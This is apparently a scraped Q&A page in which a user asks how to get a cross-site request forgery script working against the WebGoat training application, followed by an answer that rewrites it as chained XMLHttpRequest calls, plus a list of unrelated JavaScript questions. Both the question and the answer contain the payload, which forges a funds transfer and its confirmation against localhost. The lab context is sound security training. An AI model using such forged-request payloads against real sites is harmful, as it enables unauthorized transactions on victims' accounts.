JavaScript's XMLHttpRequest

My attempt to bypass the WebGoat prompt involved using a combination of code with XMLHttpRequest to send multiple requests, one using GET and the other using POST. The code snippet is as follows:

<script>
  var req1 = new XMLHttpRequest();
  req1.onreadystatechange = function() {

    if (req1.readyState == 4 && req1.status == 200) {

      req2 = new XMLHttpRequest();
      req2.open("POST", "http://localhost:8080/WebGoat/attack?Screen=32&menu=900", false);
      req2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // needs to be specified for POST requests
      req2.send("transferFunds=CONFIRM");

    }

  };
  req1.open("GET", "http://localhost:8080/WebGoat/attack?Screen=32&menu=900&transferFunds=4000", false);
  req1.send();
</script>

Upon saving this code as an file and opening it, no requests other than the initial GET request with status 302 are being made. How can I modify this code to ensure its successful execution? Browser used: Firefox 40.0.3 WebGoat Version: 6.0.1

javascript

Answer №1

If you're looking to improve efficiency, consider chaining requests together.

The process involves executing the first request and then proceeding to the next only if the callback function returns a status of 200 (OK).

An example has been provided below:

(function() {


  // Custom implementation of XMLHttpRequest object for handling requests.
  function sendServer(options) {
    var newXHR = new XMLHttpRequest() || new ActiveXObject("Microsoft.XMLHTTP");
    options.async = true;
    options.contentType = options.contentType || "application/x-www-form-urlencoded";
    newXHR.open(options.type, options.url, options.async || true);
    newXHR.setRequestHeader("Content-Type", options.contentType);
    newXHR.send((options.type == "POST") ? options.data : null);
    newXHR.onreadystatechange = options.callback;
    return newXHR;
  }



  // Usage:

  // First request: GET
  sendServer({
    type: "GET",
    url: "http://localhost:8080/WebGoat/attack?Screen=32&menu=900&transferFunds=4000",
    data: null,
    async: false,
    callback: function(xhr) {
      if (xhr.target.readyState === 4 && xhr.target.status === 200) {

        // Second request: POST
        sendServer({
          type: "POST",
          url: "http://localhost:8080/WebGoat/attack?Screen=32&menu=900",
          data: "transferFunds=CONFIRM",
          async: false,
          callback: function(xhr) {
            if (xhr.target.readyState === 4 && xhr.target.status === 200) {
              console.log(xhr.target.responseText); // Check the response.
            }
          }
        });
      }
    }
  });



})();

For further details, see the reference link: http://jsfiddle.net/dannyjhonston/jppz5nk3/1/

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

Turn an existing string into a new string where each character is changed to an asterisk, and spaces remain as spaces

I am attempting to create a new string from an existing string using javascript. In the newly generated string, all characters except for spaces would be represented by '*'. For instance, if the original string is "hide me" then the resulting ...

javascriptjquery

What is the best way to utilize a color picker to apply CSS color to a parent element?

When the pencil glyphicon is clicked, a color picker appears. I only want to apply the selected color from the color picker to the list elements that are the grand parent of the pencil glyphicon. Here's a snippet of my Ruby front-end code: <% cat ...

javascriptjqueryhtmlcss

What are the different methods for completing a form?

From what I understand, there are 2 methods for submitting a form. For instance, in asp.net, there is the Button.UseSubmitBehavior property which Specifies whether the Button control uses the client browser's submit mechanism or the ASP.NET postb ...

javascripthtmlasp.netformssubmit

Using a single function to generate multiple instances of a table in JavaScript

My journey to learning javascript led me to create a simple game called circle of crosses. Below is the code I used: (JS) // JavaScript code here (HTML) <!DOCTYPE html> <html> // HTML code here </html> I came across an issue whil ...

javascripthtml-table

Text input in Bootstrap not reaching full width

Trying to achieve a Bootstrap textfield embedded in a panel that spans 100% of the remaining space-width within the panel. However, this is the result obtained: The blue border represents the edge of the panel. Below is the code being used: <div clas ...

javascriptjquerycsstwitter-bootstrap

What is the best way to display a component based on the route using GatsbyJS?

Currently working with GatsbyJS and attempting to dynamically render different header components based on the URL route. For instance: mydomain.com/ should display HeaderLanding mydomain.com/blog should display HeaderMain Seeking guidance on how to imp ...

javascriptreactjsreact-routerjsxgatsby

a single line within a compartment

I am encountering an issue with the code snippet below, which is responsible for generating the location of different records within a table: return ( <TableRow> <TableCell > // some code_1 < ...

javascriptreactjsmaterial-ui

Confirm the object received from the API and assign default values

Seeking to extract data from an API and verify if all fields are strings, but if they are missing I aim to assign default values. My intention was to utilize the yup library to validate the object accordingly, ensuring that the returned function is prope ...

javascripttypescriptvalidationtypesyup

Building a query in Javascript by utilizing object keys and values: a step-by-step guide

I am looking to transform an object with various keys and values into a query string format, for example: obj1: { abc: "Abc", id: 1, address: "something" }. The challenge is that this object is generated dynamically, so the numbe ...

javascript

What's the process for assigning a webpack ChunkName in a Vue project?

I have encountered an issue with webpack Chunk. I have already installed "@babel/plugin-syntax-dynamic-import". Below is my configuration and import() code. Despite this, only the entry index.js file is being generated in the output folder. What could I be ...

javascriptvue.jswebpack

Modifying properties within child components

Within my parent Vue Page, I have inserted a FormInput component inside my form. new.vue <b-form @submit.prevent="submit"> <FormInput :name="name"/> <b-button @click="submit">Save</b-button> <b-form> <script> i ...

javascriptvue.jsnuxt.js

How to show multiline error messages in Materials-UI TextField

Currently, I am attempting to insert an error message into a textfield (utilizing materials UI) and I would like the error text to appear on multiple lines. Within my render method, I have the following: <TextField floatingLabelText={'Input Fi ...

javascriptreactjsmaterial-ui

Leverage Ajax to dynamically refresh content on a webpage by fetching data from a text file using PHP

I am facing an issue with updating data on my webpage using Ajax. The data is fetched through a PHP script and I need the refresh function to run every 5 seconds. However, it seems like this functionality is not working as expected. This is the JavaScript ...

javascriptphpajax

Exiting or returning from a $scope function in AngularJS: a guide

There are times when I need to exit from my $scope function based on a certain condition. I have attempted to achieve this using the return statement. However, my efforts have been in vain as it only exits from the current loop and not from the main scop ...

javascriptangularjs

Creating a duplicate of a Flex object in HTML without the need to reinitialize

I'm currently developing a flash object that involves processing a large number of images. My goal is to load multiple flash objects on the same page in order to capture an image, make adjustments, and then display it within each flash object. Howeve ...

javascriptapache-flexflashimage

Implementing relative pathing in front-end development while using ExpressJS for the back-end

I'm currently in the process of developing an application with Express 4.14. When it comes to routing, I have a situation where the incoming request is "https://example.com/page", and I am using res.sendFile(__dirname + "/../client/pages/page/index.ht ...

javascriptnode.jsexpresspath

Sending a form using an AngularJS dropdown menu

I have recently started using angularjs and decided to switch out a traditional html <select> box for an angular modal select box. The select box successfully populates with data from a $http ajax request, but I am facing issues with form submission ...

javascriptjqueryhtmlangularjsforms

Issue with html2canvas image download in Firefox

I am currently using HTML2Canvas to try and download a div as an image. It works perfectly fine on Google Chrome, but I am experiencing issues with Firefox. Below is the code snippet: <script src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0. ...

javascripthtmlcanvas

Collaborating and monitoring data between controllers

A unique challenge has arisen as we implement a tree-style navigation element that must communicate with other directives/controllers. The main objectives are: Keep track of the current selection, Detect when the row selection changes. The task at hand ...

javascriptangularjs

Transforming BufferGeometry to Geometry using FBXLoader within the Three.js library

Check out my snippet below for loading a .fbx object. It defaults to loading an object as BufferGeometry: const loader = new THREE.FBXLoader(); async function loadFiles(scene, props) { const { files, path, childName, fn } = props; if (index > fi ...

javascriptthree.jsgeometrybuffer-geometry